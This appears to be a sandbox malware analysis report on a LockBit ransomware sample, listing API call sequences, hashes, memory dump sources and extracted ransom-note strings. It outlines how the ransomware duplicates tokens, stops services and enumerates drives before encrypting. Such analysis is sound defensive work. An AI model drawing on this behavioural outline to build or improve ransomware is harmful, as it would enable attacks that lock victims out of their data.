                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 14a61e415414a2737466623214bc58bb8ed2f8f884d8e91e9da3f51b212ff1ed
                                                                                                            • Instruction ID: 8a913e19e30008d13dc48409e76330b849e7e9fa4fdf350102ef4fa26705654b
                                                                                                            • Opcode Fuzzy Hash: 14a61e415414a2737466623214bc58bb8ed2f8f884d8e91e9da3f51b212ff1ed
                                                                                                            • Instruction Fuzzy Hash: A5613755C29FE846F203663549133D1D260AFBB0ADA24E36AFCB57C4B7F75176DA2200
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0234bd01339855124dd1a7056450ce99ad8d3b23a2b96d98b2b7f0792861b2c0
                                                                                                            • Instruction ID: bfe8f73863bcda75491fcad5e5be0362d85f4885bbc9b5ddce66ed604e094273
                                                                                                            • Opcode Fuzzy Hash: 0234bd01339855124dd1a7056450ce99ad8d3b23a2b96d98b2b7f0792861b2c0
                                                                                                            • Instruction Fuzzy Hash: 74513D241197D48EC3268F7E44405A2BFF05E7710572C8ADEE8D69AB83C11AE74BDB72
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d94c2b82f6cb85390599685ee87512cbebecb584b16b6098a6949730a38281df
                                                                                                            • Instruction ID: 0ffc66577e3a2158ad75d4c69fa8fd5cf644e634801e02aef5bed490de658213
                                                                                                            • Opcode Fuzzy Hash: d94c2b82f6cb85390599685ee87512cbebecb584b16b6098a6949730a38281df
                                                                                                            • Instruction Fuzzy Hash: 4151C54050E3D15CCB0A8FBA50505A2FFF16E2B60576D92CAD0E84D143C50AC7DBABA6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8e4b5312d730b7043e458e517ac0fd8dfcef779de647ab0b975d97651ef0260a
                                                                                                            • Instruction ID: 71f894ddab9effde5e7ca2fe9906d82eaab50e64041941a5ea0c2fdca69f32d0
                                                                                                            • Opcode Fuzzy Hash: 8e4b5312d730b7043e458e517ac0fd8dfcef779de647ab0b975d97651ef0260a
                                                                                                            • Instruction Fuzzy Hash: 0F01692101A9A44ACB25DB35A1BC0FBFFE0DE2E31331A68DAC0C28B132D2284504CF55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ba465b111c3d22ccd275ee134fb175d323a16d7c5bd63c63484c025ed0e3b6c5
                                                                                                            • Instruction ID: d625eed85ba5e960323ebee15eeef8f7ead5240b56ff2ff4e9d328cc911c7c98
                                                                                                            • Opcode Fuzzy Hash: ba465b111c3d22ccd275ee134fb175d323a16d7c5bd63c63484c025ed0e3b6c5
                                                                                                            • Instruction Fuzzy Hash: 81F012211195A54EC721DB35E1EC4F7FFE4DE6A31271654DAC0C58B531E2249508CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 534a27a09ed7b78aed4b87938ebab2e12d76e1866aff6f56871202b617b79fa8
                                                                                                            • Instruction ID: dc2a8614744079de6c138e734577513db22a2a97763cd1c7e91f98c9d98f0b4d
                                                                                                            • Opcode Fuzzy Hash: 534a27a09ed7b78aed4b87938ebab2e12d76e1866aff6f56871202b617b79fa8
                                                                                                            • Instruction Fuzzy Hash: 77F01C2100B6D04AD3268B39E0989A6FFE84F6F121B1A89DED0D54F163D1689548CB12
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3bcc923908fafbeb9db2d2a5a69da882577440357aac70e5c9a6fde302f28aa9
                                                                                                            • Instruction ID: b879190e85d580ed03e5c449742e2a3d0253d117d7a35da35cdbaf67676fcf60
                                                                                                            • Opcode Fuzzy Hash: 3bcc923908fafbeb9db2d2a5a69da882577440357aac70e5c9a6fde302f28aa9
                                                                                                            • Instruction Fuzzy Hash: D1E0652140F6D04AD321CB39E0985A6FFE95F6F111B0A88DFC0D94B153C1549509C711
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • malloc.MSVCRT ref: 00411A9E
                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00411B7B
                                                                                                            • wsprintfW.USER32 ref: 00411BA3
                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00411BC5
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00411BF3
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411BFE
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00411C0C
                                                                                                              • Part of subcall function 00411CA0: GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000,?), ref: 00411D03
                                                                                                              • Part of subcall function 00411CA0: OpenProcessToken.ADVAPI32(00000000), ref: 00411D0A
                                                                                                              • Part of subcall function 00411CA0: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00411D2A
                                                                                                              • Part of subcall function 00411CA0: CloseHandle.KERNEL32(?), ref: 00411D3E
                                                                                                              • Part of subcall function 00411CA0: RegCreateKeyExA.ADVAPI32(-80000003,00000000,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00411D66
                                                                                                              • Part of subcall function 00411CA0: RegQueryValueExW.ADVAPI32(?,00000002,00000000,00000001,?,?,?,?), ref: 00411DC9
                                                                                                              • Part of subcall function 00411CA0: lstrcmpiW.KERNEL32(?,?,?,?), ref: 00411DDB
                                                                                                            • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 00411C84
                                                                                                            Strings
                                                                                                            • <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="x-ua-compatible" content="ie=9"><title>LockBit</title><hta:application id=LockBit applicationName=LockBit icon=explorer.exe selection=no scroll=no contextmenu=no i, xrefs: 00411ABB, 00411AC9, 00411B58
                                                                                                            • =, xrefs: 00411C54
                                                                                                            • S, xrefs: 00411C2B
                                                                                                            • All your files are encrypted by LockBitFor more information see Restore-My-Files.txt that is located in every encrypted folder, xrefs: 00411C36
                                                                                                            • #, xrefs: 00411C3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateFileProcessToken$CurrentExecuteFolderInformationOpenPathQueryShellValueWritelstrcmpimallocwsprintf
                                                                                                            • String ID: #$<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="x-ua-compatible" content="ie=9"><title>LockBit</title><hta:application id=LockBit applicationName=LockBit icon=explorer.exe selection=no scroll=no contextmenu=no i$=$All your files are encrypted by LockBitFor more information see Restore-My-Files.txt that is located in every encrypted folder$S
                                                                                                            • API String ID: 3546182798-504096562
                                                                                                            • Opcode ID: b62efbdc6ae99f2961e1733b0818e9bdfcec3d1ed8452aa496592d501d67d11c
                                                                                                            • Instruction ID: 27036e516c15185915eef6d2c999096d6a854e4cb5553d8195e816f98ecbc1ad
                                                                                                            • Opcode Fuzzy Hash: b62efbdc6ae99f2961e1733b0818e9bdfcec3d1ed8452aa496592d501d67d11c
                                                                                                            • Instruction Fuzzy Hash: 83514E70D08345BEEF3197718C48BFBB7A89F04348F0081AEE556D71A1E778A984839D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00416814
                                                                                                            • EnumDependentServicesA.ADVAPI32(00000000,00000001,00000000,00000000,?,?), ref: 0041682E
                                                                                                            • malloc.MSVCRT ref: 00416851
                                                                                                            • EnumDependentServicesA.ADVAPI32(00000000,00000001,?,?,?,?), ref: 00416880
                                                                                                            • OpenServiceA.ADVAPI32(?,?,00000024), ref: 004168BE
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 004168D5
                                                                                                            • Sleep.KERNEL32(00000000), ref: 004168F3
                                                                                                            • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?), ref: 00416906
                                                                                                            • GetTickCount.KERNEL32 ref: 0041691A
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00416958
                                                                                                            • free.MSVCRT(?), ref: 0041697A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CountDependentEnumServicesTick$CloseControlHandleOpenQuerySleepStatusfreemalloc
                                                                                                            • String ID: epq
                                                                                                            • API String ID: 3593987911-3110135941
                                                                                                            • Opcode ID: 34a427ad3633c26cabf52f92ac92b4fca94d669f963b3c9f3b159dd7511fae20
                                                                                                            • Instruction ID: 5f6e222ca345191e9d17c7dcb4dea451a797b5f31df6702b08ae2cc9c99cff26
                                                                                                            • Opcode Fuzzy Hash: 34a427ad3633c26cabf52f92ac92b4fca94d669f963b3c9f3b159dd7511fae20
                                                                                                            • Instruction Fuzzy Hash: 36418171D0020DEBDF11DFA4DC49BEEBBB9FF08304F114166E904A6250D7799A85CBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004175E4
                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 0041761F
                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?), ref: 00417640
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,0000000A,00000002), ref: 00417653
                                                                                                            • GetTokenInformation.ADVAPI32(00000002,0000000A(TokenIntegrityLevel),?,00000038,?), ref: 0041766C
                                                                                                            • DuplicateToken.ADVAPI32(00000002,00000002,?), ref: 00417696
                                                                                                            • SetThreadToken.ADVAPI32(00000000,?), ref: 004176A5
                                                                                                            • CloseHandle.KERNEL32(?), ref: 004176B1
                                                                                                            • CloseHandle.KERNEL32(00000002), ref: 004176B6
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004176B9
                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004176C9
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004176DB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleToken$OpenProcessProcess32$CreateDuplicateFirstInformationNextSnapshotThreadToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 412392406-0
                                                                                                            • Opcode ID: 3b5b18edfd2c9dd418df81785a26925a0707eec349329cdc6f3f4d79da96cbe6
                                                                                                            • Instruction ID: 908d1bf2e71a0210d80d85f2ec9f530c41a74aa39f2c1480dfb23c3d77f0b960
                                                                                                            • Opcode Fuzzy Hash: 3b5b18edfd2c9dd418df81785a26925a0707eec349329cdc6f3f4d79da96cbe6
                                                                                                            • Instruction Fuzzy Hash: 4D314371A04618ABDB209BA5DC49FEFBB78FF04751F004065F914A6250D7749A84CFA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Leave$EnterEntryExitInterlockedListThreadfreemallocwsprintf
                                                                                                            • String ID: 08:15:15$j
                                                                                                            • API String ID: 3435204808-2367131313
                                                                                                            • Opcode ID: 160a7f4be7cbe585e15d1becba8ecc5159376bd621b0fde84abb662330af2838
                                                                                                            • Instruction ID: 001e325ef954cee749345e79d4929c2f8876f0663c3fbe7c52bb857c770ef723
                                                                                                            • Opcode Fuzzy Hash: 160a7f4be7cbe585e15d1becba8ecc5159376bd621b0fde84abb662330af2838
                                                                                                            • Instruction Fuzzy Hash: B0319D345193429BC300EF60A81469FBBE0BF99B40F54556EF88497361EB34D98ACB9B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetShellWindow.USER32 ref: 004176F6
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 0041770B
                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?), ref: 0041771B
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,0000000A,?), ref: 0041772E
                                                                                                            • DuplicateToken.ADVAPI32(?,00000002,?), ref: 00417741
                                                                                                            • SetThreadToken.ADVAPI32(00000000,?), ref: 00417750
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041775F
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00417764
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00417767
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleProcessToken$OpenThreadWindow$DuplicateShell
                                                                                                            • String ID:
                                                                                                            • API String ID: 1498873538-0
                                                                                                            • Opcode ID: 617befff72815a5f57aad3debdedfae897361e8bc4ec8a142a2c081e4234b7cd
                                                                                                            • Instruction ID: acc020a6b13fac94f33cae7c1e156f5862abaf0a61576001f5c8491b0005c111
                                                                                                            • Opcode Fuzzy Hash: 617befff72815a5f57aad3debdedfae897361e8bc4ec8a142a2c081e4234b7cd
                                                                                                            • Instruction Fuzzy Hash: 5511C635A00108BBDB119BE5EC09BEFBF78EF09751F0080A6F904D2260EB3199109BD4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • inet_addr.WS2_32(?), ref: 0041A35B
                                                                                                            • htons.WS2_32(000001BD), ref: 0041A365
                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 0041A37B
                                                                                                            • ioctlsocket.WS2_32(00000000,8004667E,00419C59), ref: 0041A399
                                                                                                            • closesocket.WS2_32(00000000), ref: 0041A3A5
                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 0041A3B9
                                                                                                            • WSAGetLastError.WS2_32 ref: 0041A3C4
                                                                                                            • select.WS2_32(00000000,00000000,?,?,?), ref: 0041A41C
                                                                                                            • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0041A432
                                                                                                            • closesocket.WS2_32(00000000), ref: 0041A441
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: closesocket$ErrorLastconnecthtonsinet_addrioctlsocketselectsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 3769925765-0
                                                                                                            • Opcode ID: fbdcffe7282865730258060c418ac9f94931ae03a28c5248b7cce92d40dee657
                                                                                                            • Instruction ID: cf51ab9dcadbbf705db9e497f3b496682f909715bd7e76d91c5da044175e34ce
                                                                                                            • Opcode Fuzzy Hash: fbdcffe7282865730258060c418ac9f94931ae03a28c5248b7cce92d40dee657
                                                                                                            • Instruction Fuzzy Hash: 7531547091121CAADB109FA4DC4C7DF77B8EF09315F104295F824E62D0D7794A988F99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MountPointVolumewsprintf
                                                                                                            • String ID: %$:$bc's$h'"T
                                                                                                            • API String ID: 3917388826-2706984278
                                                                                                            • Opcode ID: a5b574c1308e9728ba7dcdce7fec5a7b24b541b657f8d07b126eaefbf5a5aa16
                                                                                                            • Instruction ID: fc79a7628354a4e4e24bcdf9ce54d88c51d374d2ee8d1438f9f48510c387277e
                                                                                                            • Opcode Fuzzy Hash: a5b574c1308e9728ba7dcdce7fec5a7b24b541b657f8d07b126eaefbf5a5aa16
                                                                                                            • Instruction Fuzzy Hash: 5B217C71D04248AACB11CBE5DC49ADFBFFCEF19354F44816AD804E3280E7789649CBA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000,?), ref: 00411D03
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00411D0A
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00411D2A
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00411D3E
                                                                                                            • RegCreateKeyExA.ADVAPI32(-80000003,00000000,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00411D66
                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000002,00000000,00000001,?,?,?,?), ref: 00411DC9
                                                                                                            • lstrcmpiW.KERNEL32(?,?,?,?), ref: 00411DDB
                                                                                                            • RegSetValueExW.ADVAPI32(?,00000002,00000000,00000001,?,?,?,?), ref: 00411E17
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00411E25
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseProcessTokenValue$CreateCurrentHandleInformationOpenQuerylstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 763719182-0
                                                                                                            • Opcode ID: 7eb0e3e86d36650d25eef94fb3c34d815d80d1b528fe464c51c596deff790fb2
                                                                                                            • Instruction ID: 3f204fe39781c4767e73356e597d39d3cafadb42b9e6192bcc11691f83097163
                                                                                                            • Opcode Fuzzy Hash: 7eb0e3e86d36650d25eef94fb3c34d815d80d1b528fe464c51c596deff790fb2
                                                                                                            • Instruction Fuzzy Hash: DA518271A0021AABDB10DFA5DC49FFFBBB8EF08355F054166E904B7260E7749A44CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLogicalDrives.KERNEL32 ref: 0040FAE9
                                                                                                            • GetDriveTypeW.KERNEL32(?), ref: 0040FB21
                                                                                                            • malloc.MSVCRT ref: 0040FB3C
                                                                                                            • WNetGetConnectionW.MPR(?,00000004,00000200), ref: 0040FB53
                                                                                                            • PathRemoveBackslashW.SHLWAPI(00000004), ref: 0040FB5E
                                                                                                            • OpenThreadToken.ADVAPI32(000000FE,0000000A,00000001,?), ref: 0040FB6E
                                                                                                            • DuplicateToken.ADVAPI32(?,00000002,?), ref: 0040FB86
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0040FD80,00000000,00000000,?), ref: 0040FBA7
                                                                                                            • free.MSVCRT(00000000), ref: 0040FBC4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ThreadToken$BackslashConnectionCreateDriveDrivesDuplicateLogicalOpenPathRemoveTypefreemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4235455504-0
                                                                                                            • Opcode ID: 6d0325ebd64f8f8d08d5298e3f5865116b9e13268f4b1a340873b4408924e14d
                                                                                                            • Instruction ID: cc9fd43253aa1b5df0cf1581ee85b6af3df70c619eb79c708fe252a65ade6f61
                                                                                                            • Opcode Fuzzy Hash: 6d0325ebd64f8f8d08d5298e3f5865116b9e13268f4b1a340873b4408924e14d
                                                                                                            • Instruction Fuzzy Hash: C83195B5A00209ABDB20DFA4DC59FEF77B8EF05350F104176E926E21D1E73499098B99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F9EF
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040F9F6
                                                                                                            • GetConsoleWindow.KERNEL32(00000000), ref: 0040FA27
                                                                                                            • Sleep.KERNEL32(0001869F), ref: 0040FA35
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
